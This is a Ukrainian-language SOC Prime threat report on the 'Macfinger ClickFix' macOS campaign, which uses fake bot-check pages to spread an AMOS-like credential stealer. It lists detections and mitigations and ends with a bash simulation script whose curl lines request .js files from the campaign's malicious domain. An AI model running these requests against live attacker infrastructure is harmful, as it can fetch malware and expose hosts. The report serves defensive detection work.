SOC Prime Bias: High

24 Sep 2026 06:40 UTC

Кампанія Macfinger ClickFix

Author Photo
SOC Prime Team linkedin icon Стежити
Кампанія Macfinger ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Нова кампанія соціальної інженерії, відслідковувана як Macfinger ClickFix, націлює користувачів macOS шляхом ін’єкції шкідливих скриптів на законні вебсайти. Атака представляє підроблені сторінки захисту від ботів, які обманом змушують жертв виконувати команди, що завантажують шкідливе програмне забезпечення, специфічне для macOS. Шкідливий код виглядає як варіант Atomic macOS Stealer (AMOS), призначений для збору облікових даних та іншої інформації користувача.

Розслідування

Розслідування виявило, що законні вебсайти були скомпрометовані шляхом ін’єкції скриптів, які відображають підроблені спливаючі вікна перевірки. Аналіз мережевого трафіку виявив спеціалізований домен для відстеження користувачів, а також кілька IP-адрес, що підтримують доставку шкідливого ПЗ та зв’язок з командним сервером (C2). Спостережувані шаблони трафіку вказують на ексфільтрацію облікових даних та системної інформації через HTTP POST запити.

Пом’якшення

Користувачів слід навчати уникати слідування інструкціям, представленим несподіваними спливаючими вікнами в браузері або підробленими сторінками перевірки ботів. Організаціям слід впроваджувати веб-фільтрацію для блокування відомих шкідливих доменів і IP-адрес, пов’язаних з кампаніями ClickFix. Також рекомендується стежити за незвичними вихідними з’єднаннями із ненадійними IP-адресами через нестандартні порти.

Відповідь

Якщо виявлено активність Macfinger ClickFix, уражені хости macOS повинні бути негайно ізольовані для запобігання подальшій ексфільтрації даних. Реагуючі повинні провести повне судово-медичне розслідування для визначення ступеня компрометації облікових даних. Потенційно скомпрометовані облікові дані слід скинути, а системи перевірити на наявність механізмів збереження, таких як несанкціоновані скрипти shell або виконувані файли Mach-O.

Потік атаки

Ми все ще оновлюємо цю частину.

Виявлення

Можлива спроба зв’язку з доменом через IP Lookup (через dns)

Команда SOC Prime
23 вересня 2026

Підозріла команда та управління через запит DNS з незвичним доменом верхнього рівня (через dns)

Команда SOC Prime
23 вересня 2026

Можлива спроба переліку System_profiler (через process_creation)

Команда SOC Prime
23 вересня 2026

Можлива маніпуляція з рядками, зашифрованими Base64 [MacOS] (через cmdline)

Команда SOC Prime
23 вересня 2026

Підозріла спроба виконання Curl [MacOS] (через cmdline)

Команда SOC Prime
23 вересня 2026

IOC (HashSha256) для виявлення: кампанія Macfinger ClickFix

AI-правила SOC Prime
23 вересня 2026

IOC (SourceIP) для виявлення: кампанія Macfinger ClickFix

AI-правила SOC Prime
23 вересня 2026

IOC (DestinationIP) для виявлення: кампанія Macfinger ClickFix

AI-правила SOC Prime
23 вересня 2026

Виявити трафік кампанії Macfinger ClickFix [Firewall]

AI-правила SOC Prime
23 вересня 2026

Виявити ін’єкцію скриптів Macfinger ClickFix [Webserver]

AI-правила SOC Prime
23 вересня 2026

Виконання симуляції

  • Опис атаки та команди: Зловмисник використовує техніку соціальної інженерії, відому як «ClickFix», коли користувача спонукають натиснути кнопку (часто це підроблене «виправлення» або «оновлення»), що виконує шкідливий скрипт. У цій симуляції ми відтворюємо фінальну стадію: браузер/агент на стороні клієнта робить запит до контролюючого домену Macfinger velvet-otter-glagceis.life для завантаження шкідливого .js файлу. Цей запит спрямований на відповідність одному з трьох специфічних критеріїв вибору в логіці виявлення.

  • Скрипт регресійного тесту:

    #!/bin/bash
    # Скрипт для симуляції запуску правила виявлення Macfinger ClickFix
    
    echo "[*] Запуск симуляції Macfinger ClickFix..."
    
    # Ціль 1: вибір 1 (параметр сайту)
    echo "[*] Симуляція запиту до вибору 1..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload"
    
    # Ціль 2: вибір 2 (специфічний файл з хешем)
    echo "[*] Симуляція запиту до вибору 2..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js"
    
    # Ціль 3: вибір 3 (файл ext-b)
    echo "[*] Симуляція запиту до вибору 3..."
    curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js"
    
    echo "[+] Симуляцію завершено. Перевірте SIEM для оповіщень."
  • Команди очищення:

    # Місцеве очищення не вимагається, оскільки це вихідні мережеві запити.
    # Якщо були створені місцеві файли, видаліть їх:
    rm -f /tmp/macfinger_test_*